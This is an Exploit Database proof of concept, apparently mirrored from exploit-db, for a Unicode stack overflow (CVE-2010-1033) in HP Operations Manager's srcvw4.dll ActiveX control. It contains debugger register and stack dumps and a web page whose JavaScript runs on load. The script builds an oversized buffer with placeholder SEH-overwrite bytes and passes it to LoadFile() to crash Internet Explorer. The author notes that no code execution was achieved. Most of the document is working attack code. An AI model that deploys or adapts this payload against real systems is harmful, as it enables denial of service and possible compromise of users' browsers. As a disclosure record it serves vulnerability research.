HP Operations Manager 8.16 – ‘srcvw4.dll’ ‘LoadFile()’/’SaveFile()’ Remote Unicode Stack Overflow (PoC)

• Exploit Database
• 7 阅读

• 作者： mr_me
  日期： 2010-04-20
• 类别：

  • dos
  平台：

  • windows
• 来源：https://www.exploit-db.com/exploits/12302/

• <html>
  <!--
  		|------------------------------------------------------------------|
  		| __ __|
  		| _________________/ /___ _____ / /________ _____ ___|
  		|/ ___/ __ \/ ___/ _ \/ / __ `/ __ \ / __/ _ \/ __ `/ __ `__ \ |
  		| / /__/ /_/ / //__/ / /_/ / / / // /_/__/ /_/ / / / / / / |
  		| \___/\____/_/ \___/_/\__,_/_/ /_/ \__/\___/\__,_/_/ /_/ /_/|
  		||
  		| http://www.corelan.be:8800 |
  		|security@corelan.be |
  		||
  		|-------------------------------------------------[ EIP Hunters ]--|
  
  # HP Operations Manager <= v8.16 - (srcvw4.dll) LoadFile()/SaveFile() Remote Unicode Stack Overflow PoC
  # Found by: mr_me - http://net-ninja.net/
  # Homepage: http://www.hp.com/
  # CVE: CVE-2010-1033
  # Tested on: Windows XP SP3 (IE 6 & 7)
  # Marked safe for scripting: No
  # Module path: C:\Program Files\HP\HP BTO Software\bin\srcvw4.dll
  # HP's Advisory: http://h20000.www2.hp.com/bizsupport/TechSupport/Document.jsp?objectID=c02078800
  # Advisory: http://www.corelan.be:8800/advisories.php?id=10-027
  # Greetz: Corelan Security Team
  # http://www.corelan.be:8800/index.php/security/corelan-team-members/
  # ######################################################################################################
  # Notes: 
  # - This is a 3rd party library by Tetradyne Inc (not from HP) but HP take full responsibility
  # - /SafeSEH protected module
  # - The SaveFile() function is also vulnerable to a unicode stack overflow. 
  # - Having '\x42' or 'B' as the 2nd byte of nseh will cause us to overwrite the address
  # 	of seh handler itself and not the contents.
  # - There is simply no code execution on this because there is no unicode friendly
  # 	ppr's that I know of. However you could include other components, to get code execution.
  # ######################################################################################################
  # Script provided 'as is', without any warranty.
  # Use for educational purposes only.
  # Do not use this code to do anything illegal !
  #
  # Note : you are not allowed to edit/modify this code.
  # If you do, Corelan cannot be held responsible for any damages this may cause.
  
  The Registers:
  
  EAX 002BD012
  ECX 000AEAAA
  EDX 02A90024 UNICODE "AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA"..
  EBX 80070003
  ESP 0013DA1C
  EBP 0013DA70 UNICODE "Could not open file AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA"..
  ESI 02A9258C UNICODE "AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA"..
  EDI 00140000 ASCII "Actx "
  EIP 024DA413 srcvw4.024DA413
  
  The stack:
  
  0013B600 00410041A.A.iexplore.00410041
  0013B604 00410041A.A.iexplore.00410041
  0013B608 00430043C.C.Pointer to next SEH record
  0013B60C 00420042B.B.SE handler
  0013B610 00440044D.D.
  0013B614 00440044D.D.
  
  And remember, its better to try and fail, then fail to try :-)
  -->
  <object classid='clsid:366C9C52-C402-416B-862D-1464F629CA59' id='boom' ></object>
  <script language="JavaScript" defer> 
  function b00m()
   {
  var buffSize = 1072;
  	var x = unescape("%41");
  	var y = unescape("%44");
  	// 'B' or \x41 as the 2nd byte of nseh will destroy our SEH chain
  	var nseh = unescape("%43%43");
  	var seh = unescape("%42%42");
  	while (x.length<buffSize) x += x;
  x = x.substring(0,buffSize); 
  	while (y.length<buffSize) y += y;
  y = y.substring(0,buffSize);	
  boom.LoadFile(x+nseh+seh+y);
  }
  </script>
  <body onload="JavaScript: return b00m();">
  <p><center>~ mr_me presents ~</p>
  <p><b>HP Operations Manager <= v8.16 - (srcvw4.dll) LoadFile()/SaveFile() Remote Unicode Stack Overflow PoC</b></center></p> 
  </body>
  </html>